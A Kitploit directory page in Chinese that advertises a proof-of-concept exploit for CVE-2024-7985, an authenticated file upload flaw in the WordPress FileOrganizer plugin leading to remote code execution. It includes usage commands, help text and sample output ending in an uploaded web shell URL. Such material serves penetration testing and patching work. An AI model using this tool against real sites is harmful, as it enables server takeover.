Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-7985-PoC — FileOrganizer <= 1.0.9 - 已验证(订阅者+)任意文件上传 | Kitploit
工具/GitHubGitHub/nxploited/cve-2024-7985-poc
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHubnxploited/cve-2024-7985-poc

CVE-2024-7985-PoC

FileOrganizer <= 1.0.9 - 已验证(订阅者+)任意文件上传

查看仓库
1年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-7985-PoC

FileOrganizer <= 1.0.9 - 经过身份验证的(Subscriber+)任意文件上传

FileOrganizer Exploit - CVE-2024-7985

📌 概述

CVE-2024-7985 - WordPress 插件 FileOrganizer <= 1.0.9 存在经过身份验证的任意文件上传漏洞,允许拥有 Subscriber+ 权限的攻击者远程上传并执行恶意文件。该漏洞源于 fileorganizer_ajax_handler 函数中缺少文件类型验证,从而导致远程代码执行(RCE)成为可能。

🚨 此漏洞允许攻击者在服务器上执行任意命令! 🚨

⚡ 功能特点

  • ✅ 自动化攻击 - 登录、获取 nonce、利用漏洞。
  • ✅ 利用认证用户权限绕过安全检查。
  • ✅ 自动版本检测 - 确保目标存在漏洞。
  • ✅ 自定义命令执行 - 用户可以指定任意命令。
  • ✅ 无缝处理 SSL 验证问题。

🛠️ 要求

  • Python 3
  • requests
  • beautifulsoup4

安装依赖:

root@kitploit:~
pip install requests beautifulsoup4

🚀 使用方法

root@kitploit:~
python CVE-2024-7985.py --url "http://target-site.com/wordpress" --username "admin" --password "admin" --cmd "whoami"

📖 使用帮助

root@kitploit:~
usage: CVE-2024-7985.py [-h] --url URL --username USERNAME --password PASSWORD [--cmd CMD]

FileOrganizer <= 1.0.9 - Authenticated (Subscriber+) Arbitrary File Upload by | Nxploit Khaled_alenazi

options:
  -h, --help           show this help message and exit
  --url URL            Target WordPress site URL
  --username USERNAME  WordPress Username
  --password PASSWORD  WordPress Password
  --cmd CMD            Command to execute in uploaded file

示例输出:

root@kitploit:~
[+] Vulnerable version detected: 1.0.9
[+] Logged in successfully!
[+] Extracted nonce: 7b4a95872b
[+] File uploaded successfully!
[+] Access file at: http://target-site.com/wordpress/wp-content/uploads/fileorganizer/cmd.php?cmd=whoami

🔍 漏洞利用流程

1️⃣ 版本检查 - 判断站点是否存在漏洞。
2️⃣ 身份验证 - 登录 WordPress。
3️⃣ Nonce 提取 - 获取安全令牌。
4️⃣ 文件上传 - 上传恶意 PHP 脚本。
5️⃣ 命令执行 - 执行用户指定的命令。


📌 免责声明

此脚本仅用于教育目的;作者对任何滥用或后果概不负责。 🚨

下载工具